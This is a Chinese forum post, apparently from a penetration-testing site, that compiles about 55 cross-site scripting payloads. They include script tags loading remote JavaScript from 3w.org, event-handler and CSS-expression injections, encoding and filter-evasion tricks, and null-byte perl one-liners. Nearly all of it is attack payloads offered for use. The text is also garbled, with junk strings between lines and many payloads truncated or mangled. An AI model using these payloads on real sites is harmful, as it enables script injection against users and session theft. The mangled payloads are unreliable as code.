中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2016-4-28 10:06
标题:
XSS攻击汇总
(1)普通的XSS JavaScript注入
. F0 g2 l8 K1 g( d5 P) E3 S
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 b# M) @! J2 n% u. E: s/ g
(99)另类弹框
9 G9 D4 S1 u' n# W. c) f
<q/oncut=alert()>1
+ T; O% F4 D' }! E( C/ R5 U$ P
<s/onclick=alert()>b
+ T; h* h# j3 T* {4 K& o% N
<XSS=" onclick="alert(1)//">clickme</SSX=">
7 M; ]! v6 \3 l* @ v4 \: Z, h
<zzz onclick=alert`1`>clickme</zzz>
" T. G* k a2 L1 }4 k9 C
<a onclick=alert`1`>clickme</a>
, a) _/ y0 @2 n* \; ^6 D$ p) N1 \4 x
<a=">clickme</a=">
/ d4 i8 n5 G0 b0 g9 a
<a=">clickme</a>
3 ]5 i, B5 K# {
<z=">clickme</z=">
% P( L; T' s* \% {1 A/ r$ w
<z onclick=alert`1`>clickme</z>
) F4 a0 f2 ~' g0 l# I( j3 q
1 I8 K# Y8 \ ]% N: u g. H- n2 |( Q; P
(2)IMG标签XSS使用JavaScript命令
& `8 B6 D: Q L% ^: z0 P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
4 H. S! p: P7 {+ m
6 t$ @8 ]& P! Z4 x4 F: W# W& \9 P
(3)IMG标签无分号无引号
, \9 l. M" [! H Q9 P& L
<IMG SRC=javascript:alert(‘XSS’)>
$ q- C9 a- b3 n' M: m$ f2 v
, J- u6 R% u" v* u9 @2 f) ~
(4)IMG标签大小写不敏感
: v' v6 a' x7 v. U
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
( H% H: a4 t- D& W+ E( n) |- U/ G
2 ] @& z' ~6 L ]3 G
(5)HTML编码(必须有分号)
1 E5 k4 x& i6 ~& S- P) H
<IMG SRC=javascript:alert(“XSS”)>
7 s, a% ^; z* E0 F
5 T# Z4 R: n5 i, i2 r x; h
(6)修正缺陷IMG标签
8 N, G1 {& _: z0 Z
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
' D$ W! U3 S, g6 F. Q
% s0 T7 e9 C4 Z! V
(7)formCharCode标签(
计算器
)
4 l; p+ U( ^5 U/ `. c" h1 r( ^
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
9 p E; H( h6 o% P; v! K; S
6 s7 G. _% m4 Q% X
(8)UTF-8的Unicode编码(
计算器
)
. m# l4 z/ L9 a7 a
<IMG SRC=jav..省略..S')>
- R7 s2 X/ d9 [7 W- {
z& Z6 U _# E6 Q
(9)7位的UTF-8的Unicode编码是没有分号的(
计算器
)
$ B t" ~0 B1 a
<IMG SRC=jav..省略..S')>
& o' u4 k! F% k1 t, v+ y) @
" t5 z0 t9 L7 M- b T
(10)十六进制编码也是没有分号(
计算器
)
' D; J# |7 X# A- y( |1 L
<IMG SRC=\'#\'" /span>
' P/ w' u8 n" ` ?% _, V, ? }
6 |% K0 b" C m) m2 Z1 Q/ |
(11)嵌入式标签,将Javascript分开
1 i2 {) W3 J& e9 w' H
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
& `" r+ ]3 w( a3 N2 Y, C& }8 _: o1 w2 I
* H2 l% R; T- h* x, A
(12)嵌入式编码标签,将Javascript分开
, Z* O$ Z$ `5 V5 H9 p* V+ w' D
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
( w4 ]# d1 c0 V2 |, U& {& B a7 H
$ B/ ?5 Q: U3 g$ i
(13)嵌入式换行符
2 g [8 N$ f& n- O' n0 e- w2 ~/ L
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
4 k m9 [ s& _5 w
c9 t" j9 Q+ p: Y" B; y' ~
(14)嵌入式回车
' H2 b% D& Y ?$ Z
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- S' } y" V* J6 w' l
7 r @$ |) f6 |0 V1 w j
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
1 t8 m$ n, L I5 C2 d
<IMG SRC=\'#\'" /span>
; i4 ^( D3 @$ _- b7 p
% i+ B% b/ D+ G
(16)解决限制字符(要求同页面)
; Z2 z7 e' M$ u% K7 [7 J$ a
<script>z=’document.’</script>
5 q D6 T" _* F% B) f4 j6 h4 j
<script>z=z+’write(“‘</script>
2 N8 t! x8 w' B0 \
<script>z=z+’<script’</script>
6 e. g `$ k! C, |% C
<script>z=z+’ src=ht’</script>
# H& H( |1 a! {. V ]6 p7 T
<script>z=z+’tp://ww’</script>
# X' _$ ~% N+ ?8 v8 M
<script>z=z+’w.shell’</script>
, M' d4 f& h0 X( Y& S A
<script>z=z+’.net/1.’</script>
4 N. G# r( A0 e4 R
<script>z=z+’js></sc’</script>
1 s! ]. c& U* N2 S7 R9 q
<script>z=z+’ript>”)’</script>
6 m/ C' A! W* ^8 k2 O1 @5 C% v
<script>eval_r(z)</script>
: J" k2 A1 X- P H! Z
0 I. C8 Y& ~: B [+ o
(17)空字符
# [7 |1 _& V+ n8 `
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
6 z9 T- D7 k/ g$ M, Y& H
3 g$ e/ A$ m, H8 P+ ?
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( G0 u( B, o" A$ j7 X/ X
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
3 h3 {( q- P. [! t& u6 |
2 O- `4 ^) @+ ~2 Y2 ?
(19)Spaces和meta前的IMG标签
# @* |2 u P- ?( ^
<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
6 U c) P9 j5 w9 L
+ O' e" s3 B4 G6 `
(20)Non-alpha-non-digit XSS
0 X) r/ b& z) c1 P* P2 V4 k
<SCRIPT/XSS SRC=\'#\'" /span>
http://3w.org/XSS/xss.js
”></SCRIPT>
G6 y; ]( ?# d
T1 \/ l; e/ w$ J6 b
(21)Non-alpha-non-digit XSS to 2
/ H5 e# v# M" M4 I6 I
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
2 C& t) C8 {2 _' ~( `& V
$ B+ E" f2 v$ E3 t. s
(22)Non-alpha-non-digit XSS to 3
5 Y r, f9 @$ @8 x& D3 ^1 M: {- J
<SCRIPT/SRC=\'#\'" /span>
http://3w.org/XSS/xss.js
”></SCRIPT>
, P8 x" k5 `0 j; v S
3 ?$ n# u& n! r4 y* B7 x) ~
(23)双开括号
1 h* G+ Z! e, ?+ _7 B
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
2 U5 Y8 t% s1 f$ \8 F! q' {
' ]0 d2 z$ J c: K
(24)无结束脚本标记(仅火狐等浏览器)
% Y/ h6 _9 m0 l$ Q6 ~6 O
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! U, \$ m- d" l; x8 X& j; R
/ Y% s1 E ~$ M
(25)无结束脚本标记2
0 B% P. O0 Q5 h8 O6 V
<SCRIPT SRC=//3w.org/XSS/xss.js>
6 M* ]9 y* c+ s
9 J% ` S: m* n: @
(26)半开的HTML/JavaScript XSS
. r2 m( G+ a' p' F+ ~
<IMG SRC=\'#\'" /span>
m8 \$ I% b/ N7 c
* i! K6 n( Z/ }/ d3 c
(27)双开角括号
G1 X1 ~. _, d
<iframe src=http://3w.org/XSS.html <
! O; ]) c x7 Y0 ^3 W+ s
9 ~4 j: {1 D" l/ J* m* ? u# s, z
(28)无单引号 双引号 分号
4 X4 K# a3 P) C. N- h
<SCRIPT>a=/XSS/
% a) S$ ]' d% D9 O% x
alert(a.source)</SCRIPT>
+ n; Q7 ~4 R, u4 J
! n+ s+ y: t A! a( P' `
(29)换码过滤的JavaScript
& s* m8 }0 d; V9 K
\”;alert(‘XSS’);//
% ], y' b+ J/ S
6 @( B6 K( @/ g' Z) h- o5 {; H9 [
(30)结束Title标签
& ]8 @! f6 |( o3 r# x
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 N3 b: N2 T! q' r8 ~, T6 ?
# o- k6 ^, [' l! i/ B, c
(31)Input Image
$ k! q0 K* \& d8 \/ d1 P
<INPUT SRC=\'#\'" /span>
8 T# E$ m; A$ r4 h
- Y T C0 }' i, l# A$ d' N9 Z
(32)BODY Image
7 v9 z. b O& R \9 A1 ?
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
/ \0 y% I% E& U8 k* u
8 |" n: c* J# R. }/ W* S6 f
(33)BODY标签
0 S3 Y4 b& m* h
<BODY(‘XSS’)>
. F- C0 H7 T& r
5 S$ c: K6 Y1 t# `& [6 s
(34)IMG Dynsrc
0 X0 E; V- C8 j3 S5 F* a3 I
<IMG DYNSRC=\'#\'" /span>
) X1 L( }$ H0 p! j2 i2 x6 n
3 c, C* s/ c7 }& K0 |
(35)IMG Lowsrc
0 U1 z% d, p7 T! O. h, }
<IMG LOWSRC=\'#\'" /span>
# E/ H B. Q) h3 |" z- ~
/ t! H$ ]1 a/ ~: L9 g
(36)BGSOUND
( s+ g2 }( E: S1 ^4 x
<BGSOUND SRC=\'#\'" /span>
5 X6 \, |- G# L' @% f# @; ~) V
( z# h/ L/ A+ ^- V4 W5 @( b
(37)STYLE sheet
+ h2 @# k7 [+ |( ^& y
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
) {) q: |$ d/ E, b; J1 C
* i; F. y7 v0 ^1 Y2 o' Q
(38)远程样式表
V+ c) G0 e2 X6 a0 H
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
0 K1 n' M$ z7 J8 ]0 T+ u# q; ^% m
; V& D u( w n7 X) n+ w; t) c
(39)List-style-image(列表式)
1 z/ q/ j8 d( y' G+ g5 T9 Z' D: n
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( v: s! B k* z7 z1 Y
" d# Q" Y! X9 @3 c3 v
(40)IMG VBscript
; J& c/ }- n5 C
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
7 y' y2 l6 s; |# q
; s& E7 O- u1 H5 n
(41)META链接url
. ~! k9 P4 S2 Q1 E
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
! P% l* K- W# q* ~
( d5 g5 B1 o0 ~( L' V. [
(42)Iframe
* X( q% x$ s8 Z, ]8 S3 n: Q7 r( }
<IFRAME SRC=\'#\'" /IFRAME>
9 k' X! i& \+ a. _1 w9 ]3 l' U
; a5 ?$ b( h, f9 W; O! C7 \1 B
(43)Frame
! t% J) F5 ^: [* a% d1 m/ A6 K; d5 R
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
0 k1 f+ J; S7 I& I
! l5 D# Z8 y$ N& r7 P0 g
(44)Table
$ B8 ?' L$ `0 }: U4 n2 y! E
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
8 X1 Z8 N a6 q! O6 I/ {1 T
5 P1 G$ X: q4 d9 N& @
(45)TD
5 ?. P* E* W7 Q% M% \
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
2 T8 G* z* U. p* d
3 U) N+ i# M0 p5 H
(46)DIV background-image
& ]9 T1 o1 |3 c" O% u) c0 n- u
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
P" o+ f. f# w2 F" i6 g
/ B# V) ?3 W. [
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
. X7 X/ G: N5 J0 G. e1 E5 r
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, _ o& z! f$ m" V/ c8 `
; Q, E' A4 w: ^- _4 Y
(48)DIV expression
* ^9 }/ z' x0 z r. a
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
/ |- ]; G+ F. ?
% C" E1 p8 F( n, t' I* v4 d
(49)STYLE属性分拆表达
) V5 Q* [) Y1 c8 _& K
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! h& W* R9 L8 S( I
e7 u. j! G# |" B3 F1 r
(50)匿名STYLE(组成:开角号和一个字母开头)
1 s! ?) f* N1 [% t) K4 M9 u
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
3 {( H) O+ s$ P0 [' }, M
% D, q. f8 A |
(51)STYLE background-image
" I( s6 C2 @2 @) m: p7 J4 Q# d" y# d5 [
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
. y9 _. ~5 \. A: S
& a. ?7 v" u- j) V* ^
(52)IMG STYLE方式
+ j9 \# b- [# P9 b% q% q% O
exppression(alert(“XSS”))’>
1 S9 r$ K- K+ y ?: v
; ^6 e6 c' F' P
(53)STYLE background
( E7 w$ Z) n& S2 _7 y; O
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
5 R) y. J$ O& D' J& I
8 k3 @: X$ e+ Y [; j
(54)BASE
, \! W$ u" J+ R* G; J; k$ W( V1 \
<BASE HREF=”javascript:alert(‘XSS’);//”>
- H" f# F7 |% P3 U
# B9 v: M" S% f2 D* ~0 R. x& _
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
) A+ E& f5 z2 H( I
<EMBED SRC=\'#\'" /span>
http://3w.org/XSS/xss.swf
” ></EMBED>
: A0 i- p# G$ l9 u: |; r4 N' J
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2